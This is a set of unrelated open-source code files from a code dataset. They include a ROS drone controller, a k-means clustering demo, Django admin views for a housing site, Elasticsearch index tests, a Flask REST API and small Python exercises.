self.drone_command_callback)\n # self.camera_joint_sub = rospy.Subscriber(namespace + '/joint_states', JointState, self.camera_joint_callback)\n self.camera_image_sub = rospy.Subscriber(namespace + '/image_raw', Image, self.image_callback)\n\n rospy.sleep(2.0)\n\n################################################################################\n#Main methods and publisher methods\n\n #Loop to be run inside node script\n #TODO:\n #NOTE: Not sure if this is exactly what we need\n def run_node(self):\n while not rospy.is_shutdown():\n continue\n\n #If command is for this drone then move\n #DONE\n # def move_drone_callback(self, command):\n # self.move_drone(command)\n # print(self.ID,': command recieved->',command.cmd_type[0])\n\n #Move drone\n #DONE:\n #NOTE: Need to re-test this\n # def move_drone(self, command):\n # #Command is movement type\n # if command.cmd_type[0] == G.EMERGENCY:\n # self.failsafe()\n\n # elif command.cmd_type[0] == G.LAND:\n # self.land()\n\n # elif command.cmd_type[0] == G.TAKEOFF:\n # self.takeoff()\n\n # else:\n # movement = Twist()\n # default_intensity = 0.2\n\n # for i in range(len(command.cmd_type)):\n # if command.intensity[i] != 0:\n # default_intensity = command.intensity[i]\n\n # if command.cmd_type[i] == G.X:\n # movement.linear.x = default_intensity * command.direction[i]\n\n # elif command.cmd_type[i] == G.Y:\n # movement.linear.y = default_intensity * command.direction[i]\n\n # elif command.cmd_type[i] == G.Z:\n # movement.linear.z = default_intensity * command.direction[i]\n\n # elif command.cmd_type[i] == G.THETA:\n # # +==CCW, -==CW, i.e. 
follows unit circle\n # movement.angular.z = default_intensity * command.direction[i]\n\n # self.pilot_pub.publish(movement)\n\n #Tells drone to takeoff\n #DONE\n def takeoff(self):\n self.calibrate_pub.publish(Empty())\n self.move_camera()\n\n rospy.sleep(2.0)\n\n self.takeoff_pub.publish(Empty())\n\n rospy.sleep(2.0)\n\n # self.pilot_pub.publish(self.post_takeoff)\n\n print(\"Flying\")\n\n #Tells drone to land\n #DONE: Lowers drone a little bit before landing\n def land(self):\n self.pilot_pub.publish(self.pre_land) #Not sure this is needed\n\n rospy.sleep(1.0)\n\n self.land_pub.publish(Empty())\n\n #Set the new camera joint states based on joint_data\n #DONE: Defualt behavior is to move camera straight down\n #NOTE: API is unstable as per documentation, joint_data is Twist\n def move_camera(self, joint_data=None):\n if joint_data == None:\n joint_data = Twist()\n joint_data.angular.y = -90.0\n joint_data.angular.z = 0.0\n self.camera_joint_pub.publish(joint_data)\n\n #Stop moving the drone and land\n #DONE: This works well\n #NOTE: Using this in ros shutdown hooks works well\n def failsafe(self):\n self.emergency_pub.publish(Empty())\n self.land_pub.publish(Empty())\n\n def run_movement_command(self, movementCommand):\n if movementCommand == G.GO_FORWARD:\n self.fly_drone_forward()\n elif movementCommand == G.GO_BACKWARD:\n self.fly_drone_backward()\n elif movementCommand == G.GO_RIGHT:\n self.fly_drone_right()\n elif movementCommand == G.GO_LEFT:\n self.fly_drone_left()\n elif movementCommand == G.TURN_RIGHT:\n self.rotate_drone_right()\n elif movementCommand == G.TURN_LEFT:\n self.rotate_drone_left()\n elif movementCommand == G.DO_EMERGENCY:\n self.failsafe()\n elif movementCommand == G.DO_LAND:\n self.land()\n elif movementCommand == G.DO_TAKEOFF:\n self.takeoff()\n\n def fly_drone_forward(self):\n movement = Twist()\n movement.linear.x = self.linear_x_movement_amount\n self.pilot_pub.publish(movement)\n\n def fly_drone_backward(self):\n movement = Twist()\n movement.linear.x = -self.linear_x_movement_amount\n self.pilot_pub.publish(movement)\n\n def fly_drone_right(self):\n movement = Twist()\n movement.linear.y = -self.linear_y_movement_amount\n self.pilot_pub.publish(movement)\n\n def fly_drone_left(self):\n movement = Twist()\n movement.linear.y = self.linear_y_movement_amount\n self.pilot_pub.publish(movement)\n\n def rotate_drone_right(self):\n movement = Twist()\n movement.angular.z = self.angle_rotate_amount\n self.pilot_pub.publish(movement)\n\n def rotate_drone_left(self):\n movement = Twist()\n movement.angular.z = -self.angle_rotate_amount\n self.pilot_pub.publish(movement)\n\n################################################################################\n#Callbacks\n '''\n #Callback to update camera joint data\n #DONE:\n #NOTE: Probably dont need this\n def camera_joint_callback(self, data):\n self.curr_cam_joint = data\n '''\n\n ##### PUBLISH CALLBACKS\n\n #Callback to publish image data\n #DONE: Gather image data, tag it and then publish it\n #NOTE: Havent tested this yet\n def image_callback(self, data):\n if time.time()-self.last_image_time > 1.5:\n print('Publishing Image')\n drone_image = TaggedImage()\n drone_image.image = data\n drone_image.drone_id = self.ID\n\n self.camera_image_pub.publish(drone_image)\n self.last_image_time = time.time()\n\n ##### SUBSCRIBE CALLBACKS\n def drone_command_callback(self, data):\n movementCommand = data.movement_command\n print(\"Recieved Command: \", movementCommand)\n\n self.run_movement_command(movementCommand)\n\n # def 
image_callback(self, data):\n    #     self.frame_count += 1\n    #     if self.frame_count > 100:\n    #         print('Publishing Image')\n    #         drone_image = TaggedImage()\n    #         drone_image.image = data\n    #         drone_image.drone_id = self.ID\n    #\n    #         self.camera_image_pub.publish(drone_image)\n    #         self.frame_count = 0\n\n################################################################################\n#Tests\n    #PASS\n    #NOTE: Landing == Falls out of sky\n    def test_takeoffandland(self):\n        self.takeoff()\n        rospy.sleep(5.0)\n        self.land()\n\n    #PASS\n    #NOTE: Intensity for movements probably needs to be increased\n    def test_failsafe(self):\n        self.takeoff()\n        rospy.sleep(2.0)\n        command = DroneCommand()\n        command.cmd_type.append(G.Z)\n        command.drone_id = self.ID\n        command.intensity.append(0)\n        command.direction.append(-1)\n\n        self.move_drone(command)\n        print('Waiting for SIGCHLD, will terminate in 10 seconds')\n        rospy.sleep(10.0)\n        self.failsafe()\n\n    #PASS\n    #NOTE: Intensity for movements probably needs to be increased\n    def test_moveforward(self):\n        self.takeoff()\n        rospy.sleep(2.0)\n        command = DroneCommand()\n        command.cmd_type.append(G.X)\n        command.drone_id = self.ID\n        command.intensity.append(0)\n        command.direction.append(1)\n\n        self.move_drone(command)\n        rospy.sleep(5.0)\n        self.land()\n\n    #Not yet tested\n    #Mostly just need to test camera data\n    def test_generalfunction(self):\n        self.takeoff()\n        rospy.sleep(2.0)\n        self.move_camera()\n\n        command = DroneCommand()\n        command.cmd_type.append(G.X)\n        command.drone_id = self.ID\n        command.intensity.append(0.3)\n        command.direction.append(1)\n\n        self.move_drone(command)\n        rospy.sleep(10.0)\n\n        command.cmd_type.append(G.THETA)\n        command.drone_id = self.ID\n        command.intensity.append(0)\n        command.direction.append(1)\n\n        self.move_drone(command)\n        rospy.sleep(1.0)\n\n        self.land()\n","sub_path":"scripts/Drone_Control/drone_control_copy.py","file_name":"drone_control_copy.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"560229346","text":"import numpy as np\n\ndef calc_cf(in_dist,compare_dist,bins):\n# Pass the distributions with number of bins\n    real,edges=np.histogram(compare_dist,bins=bins,density=1)\n    model,edges=np.histogram(in_dist,bins=bins,range=[np.amin(compare_dist),np.amax(compare_dist)],density=1)\n    ret_val=np.zeros(len(real))\n    for i in range(len(model)):\n        if model[i]==0:\n            ret_val[i]=real[i]\n        else:\n            ret_val[i]= (real[i]-model[i])/model[i]\n    return ret_val\n\ndef apply_cf(cf, dist):\n#pass the hist values only\n    ret_pop=np.zeros(len(dist))\n    for i in range(len(dist)):\n        if dist[i]==0:\n            ret_pop[i]=cf[i]\n        else:\n            ret_pop[i]=dist[i] + dist[i]*cf[i]\n    return (ret_pop)\n","sub_path":"lib/python/corr_fac.py","file_name":"corr_fac.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"101879384","text":"def fun1(i):\n    for n in range(1, i):\n        i *= n\n    return i\n\n\nprint(fun1(5))\n\n\ndef fun2(n):\n    if n == 1:\n        return 1\n    else:\n        return n * fun2(n - 1)\nn = fun2(5)\nprint(n)\n","sub_path":"test-1/fun2.py","file_name":"fun2.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"569964862","text":"n=int(input())\np=list(map(int,input().split()))\nsai = p[0]\nanswer = 1\nfor i in range(1,n):\n    if p[i-1]<=sai:\n        sai=p[i-1]\n    if sai >= p[i]:\n        answer = answer + 
1\nprint(answer)","sub_path":"Python_codes/p02791/s163368221.py","file_name":"s163368221.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"94750406","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets import make_blobs\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n#import Indicators as ind\n\ndb_dir = 'db'\n\ndef remap(n, start1, stop1, start2, stop2):\n return ((n-start1)/(stop1-start1))*(stop2-start2)+start2\n\ndef distance(p1,p2):\n return np.sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)\n\ndef cluster_id_min_dist(dists, point, num_clusters):\n closer = np.inf\n closer_id = 0\n for k in range(num_clusters):\n if dists[k,point] < closer:\n closer = dists[k,point]\n closer_id = k\n return closer_id\n\nplot = False\nnum_points = 1000\nnum_clusters = 3\nchanged = True\n\nX, y = make_blobs(n_samples = num_points, n_features = 2, centers = num_clusters)\n\nticker = 'TSLA'\n#df = pd.read_csv(db_dir + '/{0}.csv'.format(ticker), parse_dates = True, index_col = 1)\n#df['RSI_10'] = ind.RSI(df,10)\n# old_X = np.array([[k.timestamp(),c] for k,c in zip(df.index, df['Close'].values)])\n#df = df.dropna()\n#old_X = np.array([[k.timestamp(),c,rsi] for k,c,rsi in zip(df.index, df['Close'].values, df['RSI_10'].values)])\n\n# old_X = old_X[np.random.choice(old_X.shape[0], len(old_X)//10, replace=False), :]\n\n# X = old_X.copy()\n# X[:,0] = np.random.rand(old_X.shape[0])*(385-92)+92\n\n# X = np.random.rand(old_X.shape[0], 3)*(385-92)+92\n# X[:,:-1] = old_X\n# X[:,-1] = df['Volume'].values\n\nlabels = [-1 for k in range(num_points)]\n# V = np.array([X[k] for k in np.random.choice(range(num_points), size = num_clusters, replace = False)])\n# print(V)\nC = np.array([0 for k in range(num_clusters)])\n\n# while changed:\n# changed = False\n#\n# dists = np.matrix([[0.0 for k in range(num_points)] for w in range(num_clusters)])\n# for k in range(num_clusters):\n# for w in range(num_points):\n# dists[k,w] = distance(V[k],X[w])\n#\n# C = np.array([0 for k in range(num_clusters)])\n# for k in range(num_points):\n# new_c = cluster_id_min_dist(dists, k, num_clusters)\n# C[new_c] += 1\n# if new_c != labels[k]:\n# changed = True\n# labels[k] = new_c\n#\n# # print(C)\n#\n# for k in range(num_clusters):\n# V[k] = 1/C[k] * sum([X[w] for w in range(num_points) if labels[w] == k])\n#\n# ax1 = plt.subplot2grid((2,1),(0,0), rowspan=1, colspan=1)\n# ax2 = plt.subplot2grid((2,1),(1,0), rowspan=1, colspan=1)\n\nif plot:\n fig1 = plt.figure()\n fig2 = plt.figure()\n ax1 = fig1.add_subplot(111, projection='3d')\n ax2 = fig2.add_subplot(111, projection='3d')\n\n\nkmeans = KMeans(n_clusters = num_clusters, init='random', algorithm='full')\nkmeans = kmeans.fit(X)\nlabels = kmeans.predict(X)\nV = kmeans.cluster_centers_\n\nplt.figure(1)\nplt.scatter(X[:,0],X[:,1], c = labels)\nplt.scatter(V[:,0],V[:,1], marker='*', c='#050505', s=500)\n\nplt.show()\n\n\n# --- Comparison - native K-Means --- #\n\nif plot:\n kmeans = KMeans(n_clusters = num_clusters, init='random', algorithm='full')\n kmeans = kmeans.fit(old_X)\n labels = kmeans.predict(old_X)\n C1 = kmeans.cluster_centers_\n\n # plt.figure(2)\n ax1.set_title(\"2d data\")\n ax1.scatter(old_X[:, 0], old_X[:, 2], old_X[:, 1], c=labels)\n ax1.scatter(C1[:, 0], C1[:, 2], C1[:, 1], marker='*', c=range(len(C1)), s=500)\n\nif plot:\n kmeans = KMeans(n_clusters = num_clusters, init='random', algorithm='full')\n kmeans 
= kmeans.fit(X)\n labels = kmeans.predict(X)\n C2 = kmeans.cluster_centers_\n\n # plt.figure(2)\n ax2.set_title(\"3d data\")\n # ax2.scatter(old_X[:, 0], X[:, 1], c = labels)\n ax2.scatter(X[:, 0], X[:, 2], X[:, 1], c = labels)\n # ax2.scatter(remap(C2[:, 0], 92, 385, min(C1[:,0]), max(C1[:,0])), C2[:, 1], marker='*', c=range(len(C2)), s=500)\n ax2.scatter(C2[:, 0], C2[:, 2], C2[:, 1], marker='*', c=range(len(C2)), s=500)\n\nif plot:\n plt.show()\n\n\n# --- Comparison - tensorflow K-Means --- #\n\n# import tensorflow as tf\n\n# def input_fn():\n# return tf.train.limit_epochs(tf.convert_to_tensor(X, dtype=tf.float32), num_epochs=1)\n#\n# tf_kmeans = tf.contrib.factorization.KMeansClustering(num_clusters=num_clusters, use_mini_batch=False)\n\n# train\n# num_iterations = 10\n# previous_centers = None\n# for _ in range(num_iterations):\n# tf_kmeans.train(input_fn)\n# cluster_centers = tf_kmeans.cluster_centers()\n# if previous_centers is not None:\n# print('delta:', cluster_centers - previous_centers)\n# previous_centers = cluster_centers\n# print('score:', tf_kmeans.score(input_fn))\n# print('cluster centers:', cluster_centers)\n\n# map the input points to their clusters\n# cluster_indices = list(tf_kmeans.predict_cluster_index(input_fn))\n# for i, point in enumerate(X):\n# cluster_index = cluster_indices[i]\n# center = cluster_centers[cluster_index]\n# print('point:', point, 'is in cluster', cluster_index, 'centered at', center)\n\n# plt.figure(3)\n# ax2.scatter(X[:, 0], X[:, 1], c=cluster_indices)\n# ax2.scatter(cluster_centers[:, 0], cluster_centers[:, 1], marker='*', c='#050505', s=500)\n\n# plt.show()\n","sub_path":"Tests/Tools_Tests/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"172585372","text":"import json\n\nfrom django.core.serializers import serialize\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views import View\n\nfrom common import md5_\nfrom .models import TSysRole, TSysUser, TPublicNotice, TSlidesshow, TLuckyTicket, THouseVerify\n\n\n# Create your views here.\ndef login(request):\n # 分两种用户,一个是会员,一个管理员(系统)\n # print('--->', request.method)\n if request.method == 'POST':\n # print(request.POST)\n error = None\n\n username = request.POST['username'].strip()\n password = request.POST['password'].strip()\n remeber = request.POST.get('remeber', '') # checkbox\n\n password_ = md5_.hash_encode(password) # 转成md5后的密文\n print(password_)\n\n # 验证用户名和口令是否为空\n if not all((username, password)):\n error = f'用户名或口令不能为空!'\n\n else:\n login_user = TSysUser.objects.filter(username=username, password=password_).first()\n if login_user:\n # 超级管理员\n role_ = login_user.role\n\n login_info = {\n 'user_id': login_user.user_id,\n 'head': str(login_user.head),\n 'email': login_user.email,\n 'nick_name': login_user.nick_name,\n 'role_name': role_.role_name,\n 'role_code': role_.role_code,\n }\n\n else:\n error = f'{username} 用户名或口令错误!'\n\n if not error:\n request.session['login_user'] = login_info\n return redirect(reverse('main:dash'))\n return render(request, 'login.html', locals())\n\n\ndef dashboard(request):\n \"\"\"\n 登陆之后主页界面\n :param request:\n :return:\n \"\"\"\n notices = TPublicNotice.objects.filter(public_status=1)\n return render(request, 'dashboard.html', locals())\n\n\ndef role(request):\n \"\"\"\n 查看角色页面和删除角色\n :param request:\n :return:\n 
\"\"\"\n action = request.GET.get('action', '')\n if action == 'del':\n role_id = request.GET.get('role_id')\n TSysRole.objects.get(role_id=role_id).delete()\n user_list = TSysUser.objects.filter(role_id=role_id)\n for obj in user_list:\n obj.delete()\n\n roles = TSysRole.objects.all()\n return render(request, 'role/list.html', locals()) #\n\n\ndef list_sys_user(request):\n \"\"\"\n 查看所有管理员和删除管理员\n :param request:\n :return:\n \"\"\"\n action = request.GET.get('action', '')\n if action == 'del':\n TSysUser.objects.get(user_id=request.GET.get('user_id')).delete()\n\n # 查询系统时,除去超级管理员的用户\n users = TSysUser.objects.filter(~Q(user_id=request.session['login_user']['user_id'])).all()\n return render(request, 'sys_user/list.html', locals())\n\n\nclass EditRoleView(View): # 编辑角色信息\n \"\"\"\n 编辑角色信息和增加角色信息\n \"\"\"\n def get(self, request):\n role_id = request.GET.get('role_id', '')\n if role_id:\n role = TSysRole.objects.get(role_id=role_id)\n return render(request, 'role/edit.html', locals())\n\n def post(self, request):\n from .forms import RoleForm\n role_id = request.POST.get('role_id', '')\n if role_id:\n form = RoleForm(request.POST, instance=TSysRole.objects.get(role_id=role_id))\n else:\n form = RoleForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(reverse('main:role'))\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'role/edit.html', locals())\n\n\nclass EditSysUserView(View):\n \"\"\"\n 编辑管理员信息和增加管理员\n \"\"\"\n def get(self, request):\n user_id = request.GET.get('user_id', '')\n if user_id:\n obj = TSysUser.objects.get(user_id=user_id)\n\n roles = TSysRole.objects.filter(~Q(role_code='admin'))\n return render(request, 'sys_user/edit.html', locals())\n\n def post(self, request):\n from .forms import SysUserForm\n # print(request.POST,\"+++++++++++++++++++++\")\n user_id = request.POST.get('user_id', '')\n if user_id:\n form = SysUserForm(request.POST, request.FILES, instance=TSysUser.objects.get(user_id=user_id))\n else:\n form = SysUserForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect(reverse('main:list_sysuser'))\n\n errors = json.loads(form.errors.as_json())\n\n roles = TSysRole.objects.filter(~Q(code='admin'))\n\n return render(request, 'sys_user/edit.html', locals())\n\n\ndef logout(request):\n # 退出\n del request.session['login_user']\n return redirect(reverse(\"main:login\"))\n\n\ndef notice(request):\n notices = TPublicNotice.objects.all()\n action = request.GET.get('action', '')\n if action:\n TPublicNotice.objects.get(public_notice_id=request.GET.get('public_notice_id')).delete()\n return render(request, 'notice/list.html', locals())\n\n\nclass EditPublicNotice(View): # 编辑公告\n def get(self, request):\n public_notice_id = request.GET.get('public_notice_id', '')\n if public_notice_id:\n notice = TPublicNotice.objects.get(public_notice_id=public_notice_id)\n return render(request, 'notice/edit.html', locals())\n\n def post(self, request):\n from .forms import NoticeForm\n\n public_notice_id = request.POST.get('public_notice_id', '')\n if public_notice_id:\n notice = TPublicNotice.objects.get(public_notice_id=public_notice_id)\n form = NoticeForm(request.POST, instance=notice)\n\n else:\n form = NoticeForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect(reverse('main:notice'))\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'notice/edit.html', locals())\n\n\ndef list_slide_show(request):\n action = request.GET.get('action', '')\n if action == 'del':\n 
TSlidesshow.objects.get(pk=request.GET.get('id_')).delete()\n slides = TSlidesshow.objects.all()\n return render(request, 'sys_user/list_sildeshow.html', locals())\n\n\nclass EditSlideWhowView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TSlidesshow.objects.get(pk=id_)\n\n return render(request, 'sys_user/edit_slide.html', locals())\n\n def post(self, request):\n from .forms import SlideForm\n id_ = request.POST.get('id', '')\n if id_:\n form = SlideForm(request.POST, instance=TSlidesshow.objects.get(pk=id_))\n else:\n form = SlideForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/list_sildeshow/')\n\n errors = json.loads(form.errors.as_json())\n\n return render(request, 'sys_user/edit_slide.html', locals())\n\n\ndef list_lucky(request):\n action = request.GET.get('action', '')\n if action == 'del':\n TLuckyTicket.objects.get(pk=request.GET.get('id_')).delete()\n tickets = TLuckyTicket.objects.all()\n return render(request, 'sys_user/list_lucky.html', locals())\n\n\nclass EditLuckyView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TLuckyTicket.objects.get(pk=id_)\n\n return render(request, 'sys_user/edit_lucky.html', locals())\n\n def post(self, request):\n from .forms import LuckyForm\n id_ = request.POST.get('id', '')\n begin = request.POST.get('begin_time')\n print(f'------->>>{begin}---{type(begin)}')\n if id_:\n form = LuckyForm(request.POST, instance=TLuckyTicket.objects.get(pk=id_))\n else:\n form = LuckyForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/lucky_ticket/')\n\n errors = json.loads(form.errors.as_json())\n\n return render(request, 'sys_user/edit_lucky.html', locals())\n\n\nclass AuditMessage(View):\n def get(self, request):\n action = request.GET.get('action', '')\n if action:\n obj = THouseVerify.objects.get(pk=request.GET.get('id_'))\n\n if action == 'yes':\n obj.verify_status = 1\n elif action == 'no':\n obj.verify_status = 2\n obj.remarks = request.GET.get('remarks', '')\n obj.save()\n obj.full_clean()\n\n\n objs = THouseVerify.objects.filter(verify_status=0).all()\n return render(request, 'message/list_audit.html', locals())\n\n\nclass TPublic(View):\n def get(self, request):\n action = request.GET.get('action', '')\n public_status = request.GET.get('public_status','')\n if action:\n obj = TPublicNotice.objects.get(pk=request.GET.get('id_'))\n if action == 'yes':\n obj.public_status = 1\n elif action == 'no':\n obj.public_status = 2\n obj.remarks = request.GET.get(' public_remarks', '')\n obj.save()\n obj.full_clean()\n\n if public_status:\n objs = TPublicNotice.objects.filter(public_status=1).all()\n else:\n objs = TPublicNotice.objects.filter(public_status=0).all()\n return render(request, 'message/list_public.html', locals())\n\n\nfrom mainapp.models import TComplaint\ndef get_complain(request):\n # get请求参数:action 有三个可选值(yes, del, query)\n # yes和del 都有一个额外参数:id_(投诉的ID)\n # query 有一个参数wd:可以按照订单号或者用户账号、手机号搜索都行\n action = request.GET.get('action', '')\n if action=='yes':\n obj = TComplaint.objects.get(pk=request.GET.get('id_'))\n obj.state = 1\n obj.save()\n obj.full_clean()\n if action=='del':\n TComplaint.objects.get(pk=request.GET.get('id_')).delete()\n # 查看评论主页\n complains = TComplaint.objects.all()\n return render(request, 'complaint/list.html', locals())\n\n\nfrom mainapp.models import TComment\ndef get_comment(request):\n\n # get请求参数:action 有三个可选值(yes, del, query)\n # yes和del 都有一个额外参数:id_(投诉的ID)\n # query 
takes one parameter wd: you can search by order number, user account, or phone number\n    action = request.GET.get('action', '')\n    if action == 'yes':\n        obj = TComment.objects.get(pk=request.GET.get('id_'))\n        obj.state = 1\n        obj.save()\n        obj.full_clean()\n    if action == 'del':\n        TComment.objects.get(pk=request.GET.get('id_')).delete()\n    comments = TComment.objects.all()\n    return render(request, 'comment/list.html', locals())\n","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"638177788","text":"#\n# Task 5\n# Create a string that contains some text. Example:\n# We are not what we should be!\n# We are not what we need to be.\n# But at least we are not what we used to be\n# (Football Coach)\n# Count how many words the text contains (split it into words with the string method split)\n# Remove the punctuation (loop over all the words and strip the punctuation with the strip method)\n# Print the words in alphabetical order (find the list method that sorts)\n#\n# Advanced ** (you may skip it at first):\n# Count how many times each word occurs.\n# (Hint: build a dictionary whose keys are the words from the text\n# and whose values hold the number of occurrences of each word)\n\n\ndef text_number_of_words(text):\n    ttt = text.split(' ')\n    return len(ttt)\n\n\ndef text_without_punctuation(text):\n    ttt = text.strip()\n    ttt = ttt.replace(\"\\n\", \" \")\n    ttt = ttt.replace(\". \", \" \")\n    ttt = ttt.replace(\" - \", \" \")\n    ttt = ttt.replace(\",\", \"\")\n    ttt = ttt.replace(\"!\", \"\")\n    ttt = ttt.replace(\"?\", \"\")\n    ttt = ttt.replace(\"  \", \" \")\n    return ttt\n\n\ndef text_dictionary_of_words(text):\n    ttt = text_without_punctuation(text)\n    ttt = ttt.split(\" \")\n    ttt.sort()\n    return ttt\n\n\ndef text_frequency_analysis(text):\n    ttt = text_dictionary_of_words(text)\n    ddd = {}\n    for www in ttt:  # iterate over every word in the list\n        if www.isalnum() and not ddd.get(www):  # if the word is not in the dictionary yet...\n            qqq = ttt.count(www)  # count how many times this word occurs in the list\n            ddd[www] = qqq  # and add a new entry to the dictionary\n    return ddd\n\n\nsss = \"\"\"\nCamping is really not my cup of tea \nso I’m going to visit my friend in New York instead.\n\nDon’t trouble yourself cooking such a big meal. I eat like a bird.\n\nMy mother has to cook a lot of food when my brother comes to visit. 
\nHe eats like a horse.\n \"\"\"\nprint(\"Исходный текст:\\n\", sss)\nprint(\"Количество слов в тексте:\", text_number_of_words(sss))\nprint(\"Текст без знаков пунктуации:\\n\", text_without_punctuation(sss))\nprint(\"Словарный состав текста:\\n\", text_dictionary_of_words(sss))\nqqq = text_frequency_analysis(sss)\nprint(\"Частотный анализ текста:\\n\", qqq)\nprint(\"Количество уникальных слов:\", len(qqq))\n\n","sub_path":"hw03_05.py","file_name":"hw03_05.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"25447782","text":"# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom rest_search import connections\nfrom rest_search.tasks import (create_index, delete_index, patch_index,\n update_index)\nfrom tests.models import Book\nfrom tests.utils import patch\n\n\nclass TasksTest(TestCase):\n def setUp(self):\n Book.objects.create(id=1, title='Some book')\n\n @patch('elasticsearch.client.indices.IndicesClient.exists')\n @patch('elasticsearch.client.indices.IndicesClient.create')\n def test_create_index(self, mock_create, mock_exists):\n mock_exists.return_value = False\n\n create_index()\n mock_exists.assert_called_with('bogus')\n mock_create.assert_called_with(\n index='bogus',\n body={\n 'mappings': {\n 'Book': {\n 'properties': {\n 'tags': {\n 'index': 'not_analyzed',\n 'type': 'string',\n }\n }\n }\n },\n 'settings': {\n 'analysis': {\n 'analyzer': {\n 'default': {\n 'tokenizer': 'standard',\n 'filter': [\n 'standard',\n 'lowercase',\n 'asciifolding',\n ]\n },\n }\n }\n }\n }\n )\n\n @patch('elasticsearch.client.indices.IndicesClient.exists')\n @patch('elasticsearch.client.indices.IndicesClient.create')\n def test_create_index_exists(self, mock_create, mock_exists):\n mock_exists.return_value = True\n\n create_index()\n mock_exists.assert_called_with('bogus')\n mock_create.assert_not_called()\n\n @patch('elasticsearch.client.indices.IndicesClient.delete')\n def test_delete_index(self, mock_delete):\n delete_index(connections['default'])\n mock_delete.assert_called_with(\n index='bogus',\n ignore=404\n )\n\n @patch('rest_search.tasks.bulk')\n def test_patch_index(self, mock_bulk):\n patch_index({\n 'Book': [1],\n })\n self.assertEqual(len(mock_bulk.call_args_list), 1)\n\n @patch('elasticsearch.client.indices.IndicesClient.exists')\n @patch('elasticsearch.client.indices.IndicesClient.create')\n @patch('rest_search.tasks.bulk')\n def test_update_index(self, mock_bulk, mock_create, mock_exists):\n mock_exists.return_value = False\n\n update_index()\n mock_exists.assert_called_with('bogus')\n mock_create.assert_called_with(\n index='bogus',\n body={\n 'mappings': {\n 'Book': {\n 'properties': {\n 'tags': {\n 'index': 'not_analyzed',\n 'type': 'string',\n }\n }\n }\n },\n 'settings': {\n 'analysis': {\n 'analyzer': {\n 'default': {\n 'tokenizer': 'standard',\n 'filter': [\n 'standard',\n 'lowercase',\n 'asciifolding',\n ]\n },\n }\n }\n }\n }\n )\n\n self.assertEqual(len(mock_bulk.call_args_list), 1)\n","sub_path":"tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"378312850","text":"from . import api\nfrom flask import request, Response, url_for\nimport json\nfrom . import _create_etag, JsonResponse\nfrom . import log\nfrom . import models\nfrom . import db\nfrom . 
import read_resource\nimport mimetypes\n\n@api.route('/', methods=['GET'])\ndef get_test():\n log.debug('Yes, you got to the API root!')\n response = JsonResponse(json.dumps({\n 'posts': url_for('get_posts', _external=True),\n 'users': url_for('get_users', _external=True),\n 'comments': url_for('get_comments', _external=True),\n }), 200)\n response.add_etag()\n return response\n\n@api.route('/posts/', methods=['GET'])\ndef get_posts():\n items = models.Post.query.order_by('id').all()\n response = JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n response.set_etag(_create_etag('i am not a static value, i promise ;)'))\n response.cache_control.max_age = 3600\n response.cache_control.no_cache = True\n return response\n\n@api.route('/posts//', methods=['GET'])\ndef get_post(id):\n item = models.Post.query.get(int(id))\n accept_header = request.accept_mimetypes.best_match(['application/json', 'image/webp'])\n if accept_header == 'application/json':\n response = JsonResponse(json.dumps(item.to_dict()), status=200)\n else:\n contenttype, encoding = mimetypes.guess_type(item.image)\n response = Response(read_resource(item.image), status=200, content_type=contenttype)\n response.last_modified = item.timestamp\n response.set_etag(_create_etag([item.timestamp, accept_header]))\n response.cache_control.max_age = 31556952\n response.cache_control.no_cache = True\n response.make_conditional(request)\n return response\n\n@api.route('/users//posts/', methods=['GET'])\ndef get_user_posts(id):\n items = models.Post.query.order_by('id').filter(models.Post.user_id == id)\n return JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n\n@api.route('/users/', methods=['GET'])\ndef get_users():\n items = models.User.query.order_by('id').all()\n return JsonResponse(\n json.dumps([i.to_dict() for i in items]),\n status=200\n )\n\n@api.route('/users//', methods=['GET'])\ndef get_user(id):\n item = models.User.query.get(int(id))\n response = JsonResponse(\n json.dumps(item.to_dict()),\n status=200\n )\n response.add_etag()\n response.cache_control.max_age = 31556952\n response.make_conditional(request)\n return response\n\n@api.route('/users/', methods=['POST'])\ndef update_user():\n post = next(iter(request.form))\n d = json.loads(post)\n user = models.User(name=d['name'])\n db.session.add(user)\n db.session.commit()\n return JsonResponse(None, 201)\n\n@api.route('/users//', methods=['DELETE'])\ndef delete_user(id):\n user = models.User.query.get(id)\n if not user:\n return JsonResponse(None, 404)\n db.session.delete(user)\n db.session.commit()\n return JsonResponse(None, 